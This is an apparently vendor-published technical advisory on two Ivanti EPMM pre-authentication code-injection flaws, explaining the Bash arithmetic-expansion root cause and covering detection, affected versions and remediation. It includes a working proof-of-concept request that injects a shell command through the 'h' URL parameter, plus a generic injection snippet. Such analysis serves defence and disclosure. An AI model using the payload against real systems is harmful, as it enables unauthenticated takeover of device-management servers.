CVE-2026-1281 & CVE-2026-1340 Technical Deep Dive
Published: February 2, 2026
Executive Summary
January 2026 brought yet another critical blow to Ivanti customers. Two pre-authentication remote code execution vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile (EPMM) have been actively exploited in the wild as zero-days. Both vulnerabilities carry a CVSS score of 9.8 and allow unauthenticated attackers to achieve complete system compromise through a fascinating—and frankly terrifying—abuse of Bash's arithmetic expansion feature.
This post breaks down the technical details, exploitation mechanics, detection strategies, and remediation guidance that security teams need to know.
Background: What is Ivanti EPMM?
Ivanti Endpoint Manager Mobile (formerly MobileIron Core) is an enterprise mobility management (MDM/UEM) platform used to manage, secure, and enforce policies on mobile devices across iOS, Android, and other endpoints. It's deployed by large organizations worldwide to control corporate mobile fleets, distribute applications, and protect access to enterprise resources.
Given its privileged position in enterprise networks—often with access to sensitive device data, authentication systems, and internal resources—EPMM represents a high-value target for threat actors. This isn't EPMM's first rodeo with zero-days either: the platform was exploited via CVE-2023-35078 in 2023 and through CVE-2025-4427/CVE-2025-4428 in 2025.
The Vulnerabilities
CVE-2026-1281
- Type: Code Injection (Pre-Authentication RCE)
- CVSS Score: 9.8 (Critical)
- Affected Component: In-House Application Distribution feature
- Status: Actively exploited in the wild, added to CISA KEV
CVE-2026-1340
- Type: Code Injection (Pre-Authentication RCE)
- CVSS Score: 9.8 (Critical)
- Affected Component: Android File Transfer Configuration feature
- Status: Actively exploited in the wild
Both vulnerabilities affect on-premises EPMM installations. Cloud-hosted Ivanti Neurons for MDM, Ivanti Endpoint Manager (EPM), and Ivanti Sentry are not affected.
Technical Analysis: The Root Cause
The vulnerability exists in Bash scripts that handle URL mapping for the application store and Android file transfer features. These scripts are invoked via Apache's RewriteMap directive when specific endpoints are accessed.
The Vulnerable Architecture
EPMM's Apache configuration defines two RewriteMap instances:
RewriteMap mapAppStoreURL prg:/mi/bin/map-appstore-url
RewriteMap mapAftStoreURL prg:/mi/bin/map-aft-store-url
When a user accesses specific application store endpoints, their HTTP request parameters are passed directly to these Bash scripts. For example, a request to:
/mifs/c/appstore/fob/3/<int>/sha256:<params>/<filename>.ipa
Results in the following input being passed to the map-appstore-url script:
<params>_<int>_<filename>_.ipa_<HostHeader>_<EndpointPath>
The Bash Arithmetic Expansion Trap
Here's where things get interesting. The Bash script parses key-value pairs from the URL parameters:
if [[ -z ${ret} ]] ; then
for theKeyMapEntry in "${theAppStoreKeyValueArray[@]}" ; do
theKey="${theKeyMapEntry%%=*}"
theValue="${theKeyMapEntry##*=}"
logDebug "${FUNCNAME}" "theKey=$theKey; theValue=$theValue"
case ${theKey} in
kid)
gKeyIndex="${theValue}"
;;
st)
gStartTime="${theValue}"
if (( ${#gStartTime} != "${kValidTimeStampLength}" )) ; then
ret="${kTimestampLengthInvalidErrorCode}"
fi
;;
et)
gEndTime="${theValue}"
if (( ${#gEndTime} != "${kValidTimeStampLength}" )) ; then
ret="${kTimestampLengthInvalidErrorCode}"
fi
;;
h)
gHashPrefixString="${theValue}"
;;
*)
ret="${kURLStructureInvalidErrorCode}"
logDenial "${FUNCNAME}" "${ret}" "unknown presented key=${theKey}; theValue=${theValue}"
;;
esac
done
fi
The variable gPath is defined earlier in the script as an empty string:
gPath=""
The gStartTime variable is later used in an arithmetic comparison:
if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]] ; then
Arithmetic Expansion + Command Substitution = RCE
Bash's arithmetic expansion feature evaluates expressions within (( )) or numeric comparisons. Critically, when a variable is treated as an array with an index containing command substitution, the shell executes that command while resolving the index.
The exploit works through a chain of variable indirection:
- Setting
st=theValue(with two trailing spaces for padding to pass the 10-character length validation) - Setting
h=gPath[\command`]` where gPath is an existing variable in the script
Processing order matters: parameters are handled sequentially — kid, st, et, h — and each loop iteration overwrites theValue.
When the arithmetic comparison executes:
- Bash evaluates
${gStartTime}and finds the stringtheValue - Arithmetic evaluation resolves
theValueas a variable - That variable contains an array-style expression with command substitution
- Bash evaluates the index
- The embedded command executes
Proof of Concept
A minimal PoC demonstrating command execution:
GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,
et=1337133713,h=gPath%5B%60id%20>%20/mi/poc%60%5D
Host: target.example.com
URL-decoded:
h=gPath[`id > /mi/poc`]
This writes the output of the id command to /mi/poc on the target system.
Why This Vulnerability Class is Underappreciated
Bash arithmetic expansion vulnerabilities have been known since at least 2014 but are still frequently overlooked in security reviews.
Arithmetic contexts include:
$((expression))
((expression))
${var:offset:length}
${var[index]}
var[index]=value
[[ $var -eq $other ]]
Dangerous pattern:
user_input='x[`whoami`]'
if (( user_input == 0 )); then
echo "zero"
fi
The command executes during evaluation.
Impact Assessment
Successful exploitation grants attackers:
- Full system access
- Administrator credential exposure
- User and device data access
- Phone numbers and identifiers
- GPS and location data (if enabled)
- MDM policy modification capability
- Authentication configuration control
- Lateral movement opportunities via Ivanti Sentry
Detection and Threat Hunting
Log Analysis
Search Apache HTTPD access logs using Ivanti’s recommended regex:
^(?!127\.0\.0\.1:\d+ .*$).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404
Indicators:
- Requests to
/mifs/c/appstore/fob/or/mifs/c/aftstore/fob/ - HTTP 404 responses from these endpoints
- Bash metacharacters in parameters
Web Shell Detection
Look for:
- Modified JSP error pages (especially 401.jsp)
- POST requests to error pages
- Unexpected parameters
- Unknown WAR or JAR files
- Known web shells such as Behinder
Network Indicators
- Outbound connections from EPMM appliances
- Long-running sessions to external IPs
- Reverse shell behavior
Important: Attackers may clear local logs. Use centralized logging.
Affected Versions and Remediation
Affected Versions
- 12.5.0.x
- 12.5.1.0
- 12.6.0.x
- 12.6.1.0
- 12.7.0.x
Temporary Patches (RPM Scripts)
- RPM 12.x.0.x → 12.5.0.x / 12.6.0.x / 12.7.0.x
- RPM 12.x.1.x → 12.5.1.0 / 12.6.1.0
Must be reapplied after upgrades.
Permanent Fix
Version 12.8.0.0 (expected Q1 2026).
Patch replaces Bash scripts with Java classes:
# Before patch
RewriteMap mapAppStoreURL prg:/mi/bin/map-appstore-url
# After patch
RewriteMap mapAppStoreURL "prg:/bin/java -cp /mi/bin AppStoreUrlMapper"
Incident Response Guidance
Treat exposed systems as potentially compromised:
- Assume compromise if internet-exposed
- Rebuild or restore from known-good image
- Review Ivanti Sentry connections
- Audit authentication configs
- Hunt for persistence
- Check for unexpected users and shells
CISA Requirements
CISA added CVE-2026-1281 to KEV with a short remediation deadline of February 1, 2026.
Federal agencies must mitigate or discontinue vulnerable systems under BOD 22-01.
Key Takeaways for Security Teams
- Patch immediately
- Assume breach for exposed systems
- Monitor attack patterns
- Track internet-facing EPMM assets
- Audit Bash scripts for arithmetic expansion risk
Timeline
Pre-Jan 29, 2026 — Active exploitation
Jan 29, 2026 — Ivanti disclosure
Jan 29, 2026 — Added to CISA KEV
Jan 30, 2026 — Public PoC
Feb 1, 2026 — CISA deadline
Q1 2026 — Permanent fix expected
References
- Ivanti Security Advisory
- watchTowr Labs Technical Analysis
- CISA KEV Catalog Entry
- Rapid7 Analysis
- BleepingComputer Coverage
- Expel Security Alert
- The Register Analysis
- NCC Group — Shell Arithmetic Expansion Abuse
- NHS England Digital Advisory
- Orange Cyberdefense Advisory
About Hadrian
At Hadrian, we continuously monitor for emerging threats like these Ivanti vulnerabilities across our customers' attack surfaces. Our autonomous security platform identifies exposed assets and prioritizes risks in real-time, helping organizations respond to zero-days before they become breaches.
